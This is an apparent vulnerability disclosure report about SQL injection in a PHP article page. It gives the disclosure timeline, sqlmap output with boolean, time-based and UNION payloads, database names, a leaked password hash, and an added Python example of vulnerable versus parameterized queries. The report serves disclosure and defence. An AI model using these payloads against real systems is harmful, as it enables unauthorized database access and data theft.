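2016-01-13: Details reported to the vendor; awaiting vendor handling
2016-01-15: Vendor confirmed; details disclosed to the vendor only
2016-01-25: Details disclosed to core white hats and experts in related fields
2016-02-04: Details disclosed to regular white hats
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
Injection with sqlmap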
url:http://**.**.**.**/Articles_shows.php?artid=1371
[00:34:50] [INFO] resuming back-end DBMS 'mysql'
[00:34:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artid=1371 AND 1089=1089

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artid=1371 AND (SELECT * FROM (SELECT(SLEEP(5)))osTJ)

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: artid=-4205 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x4271595879697a656c6478717a4878526d5a706676517a4d6d76734a71664b79536a655a4b534b72,0x717a717071),NULL,NULL,NULL,NULL-- -
---
[00:34:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0.12
[00:34:51] [INFO] fetching current user
current user: 'root@localhost'
[00:34:51] [INFO] fetching current database
current database: 'cd2011chqgslhm'
[00:34:51] [INFO] fetching database names
[00:34:51] [INFO] the SQL query used returns 12 entries
[00:34:51] [INFO] resumed: information_schema
[00:34:51] [INFO] resumed: 962009dy@cdqydj
[00:34:51] [INFO] resumed: cd2011chqgslhm
[00:34:51] [INFO] resumed: cdsqyqxfj2012
[00:34:51] [INFO] resumed: cdtlz@com2012
[00:34:51] [INFO] resumed: cdtlz_articlescms
[00:34:51] [INFO] resumed: keesoft_datask2010
[00:34:51] [INFO] resumed: lqpop2011
[00:34:51] [INFO] resumed: mysql
[00:34:51] [INFO] resumed: phpmyadmin
[00:34:51] [INFO] resumed: sq_fimiticoffice
[00:34:51] [INFO] resumed: test
available databases [12]:
[*] 962009dy@cdqydj
[*] cd2011chqgslhm
[*] cdsqyqxfj2012
[*] cdtlz@com2012
[*] cdtlz_articlescms
[*] information_schema
[*] keesoft_datask2010
[*] lqpop2011
[*] mysql
[*] phpmyadmin
[*] sq_fimiticoffice
[*] test
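The contents look quite messy, and a test database was even left behind; the developer is an interesting one too.
The scan turned up, among other things, the hash of a weak password: e10adc3949ba59abbe56e057f20f883e (123456). I did not dig any deeper; the water meter has already been removed.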
You know what to do.
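The report leaves the fix unstated. As an added example (not code from the report or from the affected site), here is a numeric-id lookup in its injectable form beside a hardened form that validates the id and binds it as a parameter. Python and SQLite stand in for the site's PHP and MySQL, and the table, column and function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the table behind Articles_shows.php.
# Table/column names are assumptions; SQLite replaces MySQL here.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (artid INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (1371, 'constructed sample article')")
    return db

def show_article_vulnerable(db, artid):
    # The request value is pasted into the statement, so everything after
    # the number is parsed as SQL. This is the pattern the sqlmap log implies.
    return db.execute(
        "SELECT title FROM articles WHERE artid = " + artid).fetchall()

def show_article_hardened(db, artid):
    # 1) artid is a numeric id: accept ASCII digits only, bounded length.
    if not (artid.isascii() and artid.isdigit() and len(artid) <= 10):
        raise ValueError("artid must be a decimal integer")
    # 2) Bind the value as a parameter so it can never become SQL syntax.
    return db.execute(
        "SELECT title FROM articles WHERE artid = ?", (int(artid),)).fetchall()

def demo():
    db = make_db()
    results = {}
    # The second value is the boolean-based payload shown in the log above.
    for value in ("1371", "1371 AND 1089=1089"):
        vuln = show_article_vulnerable(db, value)
        try:
            safe = show_article_hardened(db, value)
        except ValueError:
            safe = "rejected"
        results[value] = (vuln, safe)
    return results

if __name__ == "__main__":
    for value, (vuln, safe) in demo().items():
        print(repr(value), "vulnerable:", vuln, "hardened:", safe)
```

Validation alone is not the control; the bound parameter is what keeps request data out of the SQL grammar, and the digit check simply rejects malformed ids early.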
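Severity: Medium
Vulnerability Rank: 8
Confirmed: 2016-01-15 15:37
CNVD confirmed and reproduced the reported issue. It has been passed to CNCERT for dispatch to the Sichuan sub-center, which will coordinate follow-up handling with the organization that manages the website.
None yet.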